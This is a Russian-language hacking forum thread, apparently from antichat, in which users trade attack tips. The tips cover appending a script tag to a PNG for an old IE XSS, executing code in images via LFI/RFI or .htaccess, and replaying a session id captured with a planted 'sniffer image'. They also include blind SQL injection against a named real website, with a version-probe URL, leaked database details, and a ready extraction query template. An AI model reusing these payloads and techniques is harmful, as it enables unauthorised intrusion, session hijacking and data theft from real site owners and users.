diznt Вот это твоя аватарка? https://forum.antichat.ru/avatars/avatar49286.gif Ты её сам залил? Ты как думаешь, если-бы можно было .gif файлы просто так исполнять, то долго бы этот форум прожил? Надо иногда наверное и самому подумать, тем более:
2 diznt то, что ты видел - это возможна XSS бага старого IE когда в конец png файла можно былобы приписать html/javascript и он выполнилсябы при просмотре данной картинке. Но этот баг вроде существовал еще во времена IE 5. если не раньше.
ну во-первых не gif, а png Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE
Ничего актуального тут нет - только при LFI или RFI возможно исполнить код, зашитый в картинку, без вариантов. Или загрузить .htaccess, в котором будет прописано, что .jpg или .gif или еще какое расширение будет выполняться как php-скрипт. Всё. А баги, работавшие в IE5-6 уж точно неактуальны
Подскажите новичку, пожалуйста. На одном вап-сайте вставил в форум картинку-сниффер. В логах получаю такие данные: http:/ /sait.ru/member.php?sid=7cda1b46636bc1a8d88898246a615fa6&a=forum&f=4&t=1075& Переходил по такой ссылке в течение 1й минуты после получения, но почему-то выкидывает на главную страницу. Можно ли вобще как-то использовать данную информацию?
www.reznik.pri.ee/document.ph_p?id=138 Как узнать скока сталбцоф ? Пробавал черес order by . А union select никак .. Потскожыте Или приведите пример
http://www.reznik.pri.ee/document.php?id=209+AND+SUBSTRING((version()),1,1)=5-- version: 5.1.34-log database: np2482_reznik user: np2482_reznik@localhost os: pc-linux-gnu
Ckорее всего никак, т.к. JOIN видю только слепую скулю: А вообще думать надо, кого ломаешь, там же афганцы
Я ломат несобераюс .. Проста некак немогу подобрат столпцы ... поетаму и спрашевал . А версия мне ненужна . Всё спс
эту скулю можно раскрутить толькоподбором, тоесть допустим делаем примерно такой запрс www.reznik.pri.ee/document.php?id=138 and exists (select table_name from (select table_name from information_schema.tables where table_schema = database() limit [PARAM],1) a where ascii(substr(table_name,[SymbolNumber],1))>[GM]) все что в квадратных скобках - это переменные значения [GM]- код символа [Param] - думаю сам догадаешься... [SymbolNumber] - это номер символа в текущем [Param] примерно так, если вручную то муторно и долго... Советую написать скрипт для перебора
забыл написать, если условие выполнится то страница загрузится без ошибок, если нет, то соответственно будет пустой...
SQL через header возможно ли это? Всем еще раз доброго дня. У меня вопрос к специалистам по SQL-inj: Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию. Но проблема в том, что меняется параметр client-ip из http header в него подставляется ' и сервер выдает Query: Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1247058998'' at line 1 (это все отображается при запуске указаннрй уязвимости через HTTP Editor, как я понял он изменяет данные служебного заголовка) Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация. Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо, в частности, можно ли этот client-ip передать через url браузера (как при обычных sql-inj)? Буду крайне признателен за совет!
2nub-hacker, ты прежде чем написать хотя бы попробовал что-нибудь предпринять. Ты мог бы уже раз 150 установить Denwer, поставить нужную phpbb и проверить допустимое количество символов при реге, убедившись, что там минимальное значение один символ.